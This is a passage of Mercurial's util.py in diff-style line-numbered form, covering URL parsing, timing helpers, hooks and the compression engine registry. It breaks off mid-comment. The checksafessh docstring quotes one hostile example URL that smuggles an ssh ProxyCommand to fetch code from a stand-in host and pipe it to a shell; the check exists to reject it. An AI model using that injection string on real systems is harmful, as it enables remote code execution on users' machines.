2608 2606 if escape_prefix:
2609 2607 patterns += '|' + prefix
2610 2608 if len(prefix) > 1:
2611 2609 prefix_char = prefix[1:]
2612 2610 else:
2613 2611 prefix_char = prefix
2614 2612 mapping[prefix_char] = prefix_char
2615 2613 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2616 2614 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2617 2615
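# A hedged example with an escaped prefix (note the regex-escaped '$'):
#
#   interpolate(br'\$', {b'user': b'alice'}, b'hi $user')  # -> b'hi alice'
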
2618 2616 def getport(port):
2619 2617 """Return the port for a given network service.
2620 2618
2621 2619 If port is an integer, it's returned as is. If it's a string, it's
2622 2620 looked up using socket.getservbyname(). If there's no matching
2623 2621 service, error.Abort is raised.
2624 2622 """
2625 2623 try:
2626 2624 return int(port)
2627 2625 except ValueError:
2628 2626 pass
2629 2627
2630 2628 try:
2631 2629 return socket.getservbyname(pycompat.sysstr(port))
2632 2630 except socket.error:
2633 2631 raise error.Abort(_("no port number associated with service '%s'")
2634 2632 % port)
2635 2633
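# Illustrative calls (the second relies on the system services database):
#
#   getport(b'8080')  # -> 8080
#   getport(b'http')  # -> 80, via socket.getservbyname()
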
2636 2634 class url(object):
2637 2635 r"""Reliable URL parser.
2638 2636
2639 2637 This parses URLs and provides attributes for the following
2640 2638 components:
2641 2639
2642 2640 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2643 2641
2644 2642 Missing components are set to None. The only exception is
2645 2643 fragment, which is set to '' if present but empty.
2646 2644
2647 2645 If parsefragment is False, fragment is included in query. If
2648 2646 parsequery is False, query is included in path. If both are
2649 2647 False, both fragment and query are included in path.
2650 2648
2651 2649 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2652 2650
2653 2651 Note that for backward compatibility reasons, bundle URLs do not
2654 2652 take host names. That means 'bundle://../' has a path of '../'.
2655 2653
2656 2654 Examples:
2657 2655
2658 2656 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2659 2657 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2660 2658 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2661 2659 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2662 2660 >>> url(b'file:///home/joe/repo')
2663 2661 <url scheme: 'file', path: '/home/joe/repo'>
2664 2662 >>> url(b'file:///c:/temp/foo/')
2665 2663 <url scheme: 'file', path: 'c:/temp/foo/'>
2666 2664 >>> url(b'bundle:foo')
2667 2665 <url scheme: 'bundle', path: 'foo'>
2668 2666 >>> url(b'bundle://../foo')
2669 2667 <url scheme: 'bundle', path: '../foo'>
2670 2668 >>> url(br'c:\foo\bar')
2671 2669 <url path: 'c:\\foo\\bar'>
2672 2670 >>> url(br'\\blah\blah\blah')
2673 2671 <url path: '\\\\blah\\blah\\blah'>
2674 2672 >>> url(br'\\blah\blah\blah#baz')
2675 2673 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2676 2674 >>> url(br'file:///C:\users\me')
2677 2675 <url scheme: 'file', path: 'C:\\users\\me'>
2678 2676
2679 2677 Authentication credentials:
2680 2678
2681 2679 >>> url(b'ssh://joe:xyz@x/repo')
2682 2680 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2683 2681 >>> url(b'ssh://joe@x/repo')
2684 2682 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2685 2683
2686 2684 Query strings and fragments:
2687 2685
2688 2686 >>> url(b'http://host/a?b#c')
2689 2687 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2690 2688 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2691 2689 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2692 2690
2693 2691 Empty path:
2694 2692
2695 2693 >>> url(b'')
2696 2694 <url path: ''>
2697 2695 >>> url(b'#a')
2698 2696 <url path: '', fragment: 'a'>
2699 2697 >>> url(b'http://host/')
2700 2698 <url scheme: 'http', host: 'host', path: ''>
2701 2699 >>> url(b'http://host/#a')
2702 2700 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2703 2701
2704 2702 Only scheme:
2705 2703
2706 2704 >>> url(b'http:')
2707 2705 <url scheme: 'http'>
2708 2706 """
2709 2707
2710 2708 _safechars = "!~*'()+"
2711 2709 _safepchars = "/!~*'()+:\\"
2712 2710 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2713 2711
2714 2712 def __init__(self, path, parsequery=True, parsefragment=True):
2715 2713 # We slowly chomp away at path until we have only the path left
2716 2714 self.scheme = self.user = self.passwd = self.host = None
2717 2715 self.port = self.path = self.query = self.fragment = None
2718 2716 self._localpath = True
2719 2717 self._hostport = ''
2720 2718 self._origpath = path
2721 2719
2722 2720 if parsefragment and '#' in path:
2723 2721 path, self.fragment = path.split('#', 1)
2724 2722
2725 2723 # special case for Windows drive letters and UNC paths
2726 2724 if hasdriveletter(path) or path.startswith('\\\\'):
2727 2725 self.path = path
2728 2726 return
2729 2727
2730 2728 # For compatibility reasons, we can't handle bundle paths as
2731 2729 # normal URLS
2732 2730 if path.startswith('bundle:'):
2733 2731 self.scheme = 'bundle'
2734 2732 path = path[7:]
2735 2733 if path.startswith('//'):
2736 2734 path = path[2:]
2737 2735 self.path = path
2738 2736 return
2739 2737
2740 2738 if self._matchscheme(path):
2741 2739 parts = path.split(':', 1)
2742 2740 if parts[0]:
2743 2741 self.scheme, path = parts
2744 2742 self._localpath = False
2745 2743
2746 2744 if not path:
2747 2745 path = None
2748 2746 if self._localpath:
2749 2747 self.path = ''
2750 2748 return
2751 2749 else:
2752 2750 if self._localpath:
2753 2751 self.path = path
2754 2752 return
2755 2753
2756 2754 if parsequery and '?' in path:
2757 2755 path, self.query = path.split('?', 1)
2758 2756 if not path:
2759 2757 path = None
2760 2758 if not self.query:
2761 2759 self.query = None
2762 2760
2763 2761 # // is required to specify a host/authority
2764 2762 if path and path.startswith('//'):
2765 2763 parts = path[2:].split('/', 1)
2766 2764 if len(parts) > 1:
2767 2765 self.host, path = parts
2768 2766 else:
2769 2767 self.host = parts[0]
2770 2768 path = None
2771 2769 if not self.host:
2772 2770 self.host = None
2773 2771 # path of file:///d is /d
2774 2772 # path of file:///d:/ is d:/, not /d:/
2775 2773 if path and not hasdriveletter(path):
2776 2774 path = '/' + path
2777 2775
2778 2776 if self.host and '@' in self.host:
2779 2777 self.user, self.host = self.host.rsplit('@', 1)
2780 2778 if ':' in self.user:
2781 2779 self.user, self.passwd = self.user.split(':', 1)
2782 2780 if not self.host:
2783 2781 self.host = None
2784 2782
2785 2783 # Don't split on colons in IPv6 addresses without ports
2786 2784 if (self.host and ':' in self.host and
2787 2785 not (self.host.startswith('[') and self.host.endswith(']'))):
2788 2786 self._hostport = self.host
2789 2787 self.host, self.port = self.host.rsplit(':', 1)
2790 2788 if not self.host:
2791 2789 self.host = None
2792 2790
2793 2791 if (self.host and self.scheme == 'file' and
2794 2792 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2795 2793 raise error.Abort(_('file:// URLs can only refer to localhost'))
2796 2794
2797 2795 self.path = path
2798 2796
2799 2797 # leave the query string escaped
2800 2798 for a in ('user', 'passwd', 'host', 'port',
2801 2799 'path', 'fragment'):
2802 2800 v = getattr(self, a)
2803 2801 if v is not None:
2804 2802 setattr(self, a, urlreq.unquote(v))
2805 2803
2806 2804 @encoding.strmethod
2807 2805 def __repr__(self):
2808 2806 attrs = []
2809 2807 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2810 2808 'query', 'fragment'):
2811 2809 v = getattr(self, a)
2812 2810 if v is not None:
2813 2811 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2814 2812 return '<url %s>' % ', '.join(attrs)
2815 2813
2816 2814 def __bytes__(self):
2817 2815 r"""Join the URL's components back into a URL string.
2818 2816
2819 2817 Examples:
2820 2818
2821 2819 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2822 2820 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2823 2821 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2824 2822 'http://user:pw@host:80/?foo=bar&baz=42'
2825 2823 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2826 2824 'http://user:pw@host:80/?foo=bar%3dbaz'
2827 2825 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2828 2826 'ssh://user:pw@[::1]:2200//home/joe#'
2829 2827 >>> bytes(url(b'http://localhost:80//'))
2830 2828 'http://localhost:80//'
2831 2829 >>> bytes(url(b'http://localhost:80/'))
2832 2830 'http://localhost:80/'
2833 2831 >>> bytes(url(b'http://localhost:80'))
2834 2832 'http://localhost:80/'
2835 2833 >>> bytes(url(b'bundle:foo'))
2836 2834 'bundle:foo'
2837 2835 >>> bytes(url(b'bundle://../foo'))
2838 2836 'bundle:../foo'
2839 2837 >>> bytes(url(b'path'))
2840 2838 'path'
2841 2839 >>> bytes(url(b'file:///tmp/foo/bar'))
2842 2840 'file:///tmp/foo/bar'
2843 2841 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2844 2842 'file:///c:/tmp/foo/bar'
2845 2843 >>> print(url(br'bundle:foo\bar'))
2846 2844 bundle:foo\bar
2847 2845 >>> print(url(br'file:///D:\data\hg'))
2848 2846 file:///D:\data\hg
2849 2847 """
2850 2848 if self._localpath:
2851 2849 s = self.path
2852 2850 if self.scheme == 'bundle':
2853 2851 s = 'bundle:' + s
2854 2852 if self.fragment:
2855 2853 s += '#' + self.fragment
2856 2854 return s
2857 2855
2858 2856 s = self.scheme + ':'
2859 2857 if self.user or self.passwd or self.host:
2860 2858 s += '//'
2861 2859 elif self.scheme and (not self.path or self.path.startswith('/')
2862 2860 or hasdriveletter(self.path)):
2863 2861 s += '//'
2864 2862 if hasdriveletter(self.path):
2865 2863 s += '/'
2866 2864 if self.user:
2867 2865 s += urlreq.quote(self.user, safe=self._safechars)
2868 2866 if self.passwd:
2869 2867 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2870 2868 if self.user or self.passwd:
2871 2869 s += '@'
2872 2870 if self.host:
2873 2871 if not (self.host.startswith('[') and self.host.endswith(']')):
2874 2872 s += urlreq.quote(self.host)
2875 2873 else:
2876 2874 s += self.host
2877 2875 if self.port:
2878 2876 s += ':' + urlreq.quote(self.port)
2879 2877 if self.host:
2880 2878 s += '/'
2881 2879 if self.path:
2882 2880 # TODO: similar to the query string, we should not unescape the
2883 2881 # path when we store it, the path might contain '%2f' = '/',
2884 2882 # which we should *not* escape.
2885 2883 s += urlreq.quote(self.path, safe=self._safepchars)
2886 2884 if self.query:
2887 2885 # we store the query in escaped form.
2888 2886 s += '?' + self.query
2889 2887 if self.fragment is not None:
2890 2888 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2891 2889 return s
2892 2890
2893 2891 __str__ = encoding.strmethod(__bytes__)
2894 2892
2895 2893 def authinfo(self):
2896 2894 user, passwd = self.user, self.passwd
2897 2895 try:
2898 2896 self.user, self.passwd = None, None
2899 2897 s = bytes(self)
2900 2898 finally:
2901 2899 self.user, self.passwd = user, passwd
2902 2900 if not self.user:
2903 2901 return (s, None)
2904 2902 # authinfo[1] is passed to urllib2 password manager, and its
2905 2903 # URIs must not contain credentials. The host is passed in the
2906 2904 # URIs list because Python < 2.4.3 uses only that to search for
2907 2905 # a password.
2908 2906 return (s, (None, (s, self.host),
2909 2907 self.user, self.passwd or ''))
2910 2908
2911 2909 def isabs(self):
2912 2910 if self.scheme and self.scheme != 'file':
2913 2911 return True # remote URL
2914 2912 if hasdriveletter(self.path):
2915 2913 return True # absolute for our purposes - can't be joined()
2916 2914 if self.path.startswith(br'\\'):
2917 2915 return True # Windows UNC path
2918 2916 if self.path.startswith('/'):
2919 2917 return True # POSIX-style
2920 2918 return False
2921 2919
2922 2920 def localpath(self):
2923 2921 if self.scheme == 'file' or self.scheme == 'bundle':
2924 2922 path = self.path or '/'
2925 2923 # For Windows, we need to promote hosts containing drive
2926 2924 # letters to paths with drive letters.
2927 2925 if hasdriveletter(self._hostport):
2928 2926 path = self._hostport + '/' + self.path
2929 2927 elif (self.host is not None and self.path
2930 2928 and not hasdriveletter(path)):
2931 2929 path = '/' + path
2932 2930 return path
2933 2931 return self._origpath
2934 2932
2935 2933 def islocal(self):
2936 2934 '''whether localpath will return something that posixfile can open'''
2937 2935 return (not self.scheme or self.scheme == 'file'
2938 2936 or self.scheme == 'bundle')
2939 2937
2940 2938 def hasscheme(path):
2941 2939 return bool(url(path).scheme)
2942 2940
2943 2941 def hasdriveletter(path):
2944 2942 return path and path[1:2] == ':' and path[0:1].isalpha()
2945 2943
2946 2944 def urllocalpath(path):
2947 2945 return url(path, parsequery=False, parsefragment=False).localpath()
2948 2946
2949 2947 def checksafessh(path):
2950 2948 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2951 2949
2952 2950 This is a sanity check for ssh urls. ssh will parse the first item as
2953 2951 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2954 2952 Let's prevent these potentially exploited urls entirely and warn the
2955 2953 user.
2956 2954
2957 2955 Raises an error.Abort when the url is unsafe.
2958 2956 """
2959 2957 path = urlreq.unquote(path)
2960 2958 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2961 2959 raise error.Abort(_('potentially unsafe url: %r') %
2962 2960 (pycompat.bytestr(path),))
2963 2961
2964 2962 def hidepassword(u):
2965 2963 '''hide user credential in a url string'''
2966 2964 u = url(u)
2967 2965 if u.passwd:
2968 2966 u.passwd = '***'
2969 2967 return bytes(u)
2970 2968
2971 2969 def removeauth(u):
2972 2970 '''remove all authentication information from a url string'''
2973 2971 u = url(u)
2974 2972 u.user = u.passwd = None
2975 2973 return bytes(u)
2976 2974
2977 2975 timecount = unitcountfn(
2978 2976 (1, 1e3, _('%.0f s')),
2979 2977 (100, 1, _('%.1f s')),
2980 2978 (10, 1, _('%.2f s')),
2981 2979 (1, 1, _('%.3f s')),
2982 2980 (100, 0.001, _('%.1f ms')),
2983 2981 (10, 0.001, _('%.2f ms')),
2984 2982 (1, 0.001, _('%.3f ms')),
2985 2983 (100, 0.000001, _('%.1f us')),
2986 2984 (10, 0.000001, _('%.2f us')),
2987 2985 (1, 0.000001, _('%.3f us')),
2988 2986 (100, 0.000000001, _('%.1f ns')),
2989 2987 (10, 0.000000001, _('%.2f ns')),
2990 2988 (1, 0.000000001, _('%.3f ns')),
2991 2989 )
2992 2990
2993 2991 @attr.s
2994 2992 class timedcmstats(object):
2995 2993 """Stats information produced by the timedcm context manager on entering."""
2996 2994
2997 2995     # the starting value of the timer as a float (meaning and resolution are
2998 2996 # platform dependent, see util.timer)
2999 2997 start = attr.ib(default=attr.Factory(lambda: timer()))
3000 2998 # the number of seconds as a floating point value; starts at 0, updated when
3001 2999 # the context is exited.
3002 3000 elapsed = attr.ib(default=0)
3003 3001 # the number of nested timedcm context managers.
3004 3002 level = attr.ib(default=1)
3005 3003
3006 3004 def __bytes__(self):
3007 3005 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3008 3006
3009 3007 __str__ = encoding.strmethod(__bytes__)
3010 3008
3011 3009 @contextlib.contextmanager
3012 3010 def timedcm(whencefmt, *whenceargs):
3013 3011 """A context manager that produces timing information for a given context.
3014 3012
3015 3013     On entering, a timedcmstats instance is produced.
3016 3014
3017 3015 This context manager is reentrant.
3018 3016
3019 3017 """
3020 3018 # track nested context managers
3021 3019 timedcm._nested += 1
3022 3020 timing_stats = timedcmstats(level=timedcm._nested)
3023 3021 try:
3024 3022 with tracing.log(whencefmt, *whenceargs):
3025 3023 yield timing_stats
3026 3024 finally:
3027 3025 timing_stats.elapsed = timer() - timing_stats.start
3028 3026 timedcm._nested -= 1
3029 3027
3030 3028 timedcm._nested = 0
3031 3029
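# A hedged sketch of timedcm in use:
#
#   with timedcm(b'query') as stats:
#       pass  # ... timed work ...
#   # bytes(stats) renders via timecount(), e.g. '1.230 ms'
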
3032 3030 def timed(func):
3033 3031 '''Report the execution time of a function call to stderr.
3034 3032
3035 3033 During development, use as a decorator when you need to measure
3036 3034 the cost of a function, e.g. as follows:
3037 3035
3038 3036 @util.timed
3039 3037 def foo(a, b, c):
3040 3038 pass
3041 3039 '''
3042 3040
3043 3041 def wrapper(*args, **kwargs):
3044 3042 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3045 3043 result = func(*args, **kwargs)
3046 3044 stderr = procutil.stderr
3047 3045 stderr.write('%s%s: %s\n' % (
3048 3046 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3049 3047 time_stats))
3050 3048 return result
3051 3049 return wrapper
3052 3050
3053 3051 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3054 3052 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3055 3053
3056 3054 def sizetoint(s):
3057 3055 '''Convert a space specifier to a byte count.
3058 3056
3059 3057 >>> sizetoint(b'30')
3060 3058 30
3061 3059 >>> sizetoint(b'2.2kb')
3062 3060 2252
3063 3061 >>> sizetoint(b'6M')
3064 3062 6291456
3065 3063 '''
3066 3064 t = s.strip().lower()
3067 3065 try:
3068 3066 for k, u in _sizeunits:
3069 3067 if t.endswith(k):
3070 3068 return int(float(t[:-len(k)]) * u)
3071 3069 return int(t)
3072 3070 except ValueError:
3073 3071 raise error.ParseError(_("couldn't parse size: %s") % s)
3074 3072
3075 3073 class hooks(object):
3076 3074 '''A collection of hook functions that can be used to extend a
3077 3075 function's behavior. Hooks are called in lexicographic order,
3078 3076 based on the names of their sources.'''
3079 3077
3080 3078 def __init__(self):
3081 3079 self._hooks = []
3082 3080
3083 3081 def add(self, source, hook):
3084 3082 self._hooks.append((source, hook))
3085 3083
3086 3084 def __call__(self, *args):
3087 3085 self._hooks.sort(key=lambda x: x[0])
3088 3086 results = []
3089 3087 for source, hook in self._hooks:
3090 3088 results.append(hook(*args))
3091 3089 return results
3092 3090
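# Sketch: hooks run in lexicographic order of their source names (names
# illustrative):
#
#   h = hooks()
#   h.add(b'zext', lambda v: v + 1)
#   h.add(b'aext', lambda v: v * 2)
#   h(3)  # -> [6, 4]: 'aext' runs before 'zext'
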
3093 3091 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3094 3092 '''Yields lines for a nicely formatted stacktrace.
3095 3093     Skips the 'skip' last entries, then returns the last 'depth' entries.
3096 3094 Each file+linenumber is formatted according to fileline.
3097 3095 Each line is formatted according to line.
3098 3096 If line is None, it yields:
3099 3097 length of longest filepath+line number,
3100 3098 filepath+linenumber,
3101 3099 function
3102 3100
3103 3101     Not to be used in production code, but very convenient while developing.
3104 3102 '''
3105 3103 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3106 3104 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3107 3105 ][-depth:]
3108 3106 if entries:
3109 3107 fnmax = max(len(entry[0]) for entry in entries)
3110 3108 for fnln, func in entries:
3111 3109 if line is None:
3112 3110 yield (fnmax, fnln, func)
3113 3111 else:
3114 3112 yield line % (fnmax, fnln, func)
3115 3113
3116 3114 def debugstacktrace(msg='stacktrace', skip=0,
3117 3115 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3118 3116 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3119 3117     Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3120 3118     By default it will flush stdout first.
3121 3119     It can be used anywhere and intentionally does not require a ui object.
3122 3120     Not to be used in production code, but very convenient while developing.
3123 3121 '''
3124 3122 if otherf:
3125 3123 otherf.flush()
3126 3124 f.write('%s at:\n' % msg.rstrip())
3127 3125 for line in getstackframes(skip + 1, depth=depth):
3128 3126 f.write(line)
3129 3127 f.flush()
3130 3128
3131 3129 class dirs(object):
3132 3130 '''a multiset of directory names from a dirstate or manifest'''
3133 3131
3134 3132 def __init__(self, map, skip=None):
3135 3133 self._dirs = {}
3136 3134 addpath = self.addpath
3137 3135 if safehasattr(map, 'iteritems') and skip is not None:
3138 3136 for f, s in map.iteritems():
3139 3137 if s[0] != skip:
3140 3138 addpath(f)
3141 3139 else:
3142 3140 for f in map:
3143 3141 addpath(f)
3144 3142
3145 3143 def addpath(self, path):
3146 3144 dirs = self._dirs
3147 3145 for base in finddirs(path):
3148 3146 if base in dirs:
3149 3147 dirs[base] += 1
3150 3148 return
3151 3149 dirs[base] = 1
3152 3150
3153 3151 def delpath(self, path):
3154 3152 dirs = self._dirs
3155 3153 for base in finddirs(path):
3156 3154 if dirs[base] > 1:
3157 3155 dirs[base] -= 1
3158 3156 return
3159 3157 del dirs[base]
3160 3158
3161 3159 def __iter__(self):
3162 3160 return iter(self._dirs)
3163 3161
3164 3162 def __contains__(self, d):
3165 3163 return d in self._dirs
3166 3164
3167 3165 if safehasattr(parsers, 'dirs'):
3168 3166 dirs = parsers.dirs
3169 3167
3170 3168 def finddirs(path):
3171 3169 pos = path.rfind('/')
3172 3170 while pos != -1:
3173 3171 yield path[:pos]
3174 3172 pos = path.rfind('/', 0, pos)
3175 3173
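# Illustrative behavior of the directory multiset and finddirs():
#
#   list(finddirs(b'a/b/c'))  # -> [b'a/b', b'a']
#   d = dirs([b'a/b/f1', b'a/c/f2'])
#   b'a' in d    # -> True (refcounted twice)
#   d.delpath(b'a/c/f2')
#   b'a/c' in d  # -> False; b'a' survives with count 1
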
3176 3174 # compression code
3177 3175
3178 3176 SERVERROLE = 'server'
3179 3177 CLIENTROLE = 'client'
3180 3178
3181 3179 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3182 3180 (u'name', u'serverpriority',
3183 3181 u'clientpriority'))
3184 3182
3185 3183 class compressormanager(object):
3186 3184 """Holds registrations of various compression engines.
3187 3185
3188 3186 This class essentially abstracts the differences between compression
3189 3187 engines to allow new compression formats to be added easily, possibly from
3190 3188 extensions.
3191 3189
3192 3190 Compressors are registered against the global instance by calling its
3193 3191 ``register()`` method.
3194 3192 """
3195 3193 def __init__(self):
3196 3194 self._engines = {}
3197 3195 # Bundle spec human name to engine name.
3198 3196 self._bundlenames = {}
3199 3197 # Internal bundle identifier to engine name.
3200 3198 self._bundletypes = {}
3201 3199 # Revlog header to engine name.
3202 3200 self._revlogheaders = {}
3203 3201 # Wire proto identifier to engine name.
3204 3202 self._wiretypes = {}
3205 3203
3206 3204 def __getitem__(self, key):
3207 3205 return self._engines[key]
3208 3206
3209 3207 def __contains__(self, key):
3210 3208 return key in self._engines
3211 3209
3212 3210 def __iter__(self):
3213 3211 return iter(self._engines.keys())
3214 3212
3215 3213 def register(self, engine):
3216 3214 """Register a compression engine with the manager.
3217 3215
3218 3216 The argument must be a ``compressionengine`` instance.
3219 3217 """
3220 3218 if not isinstance(engine, compressionengine):
3221 3219 raise ValueError(_('argument must be a compressionengine'))
3222 3220
3223 3221 name = engine.name()
3224 3222
3225 3223 if name in self._engines:
3226 3224 raise error.Abort(_('compression engine %s already registered') %
3227 3225 name)
3228 3226
3229 3227 bundleinfo = engine.bundletype()
3230 3228 if bundleinfo:
3231 3229 bundlename, bundletype = bundleinfo
3232 3230
3233 3231 if bundlename in self._bundlenames:
3234 3232 raise error.Abort(_('bundle name %s already registered') %
3235 3233 bundlename)
3236 3234 if bundletype in self._bundletypes:
3237 3235 raise error.Abort(_('bundle type %s already registered by %s') %
3238 3236 (bundletype, self._bundletypes[bundletype]))
3239 3237
3240 3238 # No external facing name declared.
3241 3239 if bundlename:
3242 3240 self._bundlenames[bundlename] = name
3243 3241
3244 3242 self._bundletypes[bundletype] = name
3245 3243
3246 3244 wiresupport = engine.wireprotosupport()
3247 3245 if wiresupport:
3248 3246 wiretype = wiresupport.name
3249 3247 if wiretype in self._wiretypes:
3250 3248 raise error.Abort(_('wire protocol compression %s already '
3251 3249 'registered by %s') %
3252 3250 (wiretype, self._wiretypes[wiretype]))
3253 3251
3254 3252 self._wiretypes[wiretype] = name
3255 3253
3256 3254 revlogheader = engine.revlogheader()
3257 3255 if revlogheader and revlogheader in self._revlogheaders:
3258 3256 raise error.Abort(_('revlog header %s already registered by %s') %
3259 3257 (revlogheader, self._revlogheaders[revlogheader]))
3260 3258
3261 3259 if revlogheader:
3262 3260 self._revlogheaders[revlogheader] = name
3263 3261
3264 3262 self._engines[name] = engine
3265 3263
3266 3264 @property
3267 3265 def supportedbundlenames(self):
3268 3266 return set(self._bundlenames.keys())
3269 3267
3270 3268 @property
3271 3269 def supportedbundletypes(self):
3272 3270 return set(self._bundletypes.keys())
3273 3271
3274 3272 def forbundlename(self, bundlename):
3275 3273 """Obtain a compression engine registered to a bundle name.
3276 3274
3277 3275 Will raise KeyError if the bundle type isn't registered.
3278 3276
3279 3277 Will abort if the engine is known but not available.
3280 3278 """
3281 3279 engine = self._engines[self._bundlenames[bundlename]]
3282 3280 if not engine.available():
3283 3281 raise error.Abort(_('compression engine %s could not be loaded') %
3284 3282 engine.name())
3285 3283 return engine
3286 3284
    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))

    def forwiretype(self, wiretype):
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

compengines = compressormanager()
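
# Illustrative sketch (not executed): once the engines defined below are
# registered, callers resolve them through this manager, e.g.:
#
#   engine = compengines.forbundlename('gzip')   # by bundle spec name
#   engine = compengines.forbundletype('GZ')     # by internal bundle id
#   engine = compengines.forrevlogheader('x')    # by revlog chunk header
#
# Lookups raise KeyError for unknown names and abort if the engine is
# registered but unavailable in this installation.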

class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of chunks of bytes representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``StorageError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()

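# Illustrative sketch (assumptions, not part of the module): a minimal
# engine participating only in bundle compression would subclass
# compressionengine roughly like this and be passed to
# compengines.register(). The names and identifiers are hypothetical:
#
#   class _exampleengine(compressionengine):
#       def name(self):
#           return 'example'                  # hypothetical engine name
#       def bundletype(self):
#           """Docstring surfaced in the bundle compression help."""
#           return 'example', 'EX'            # hypothetical spec name and id
#       def compressstream(self, it, opts=None):
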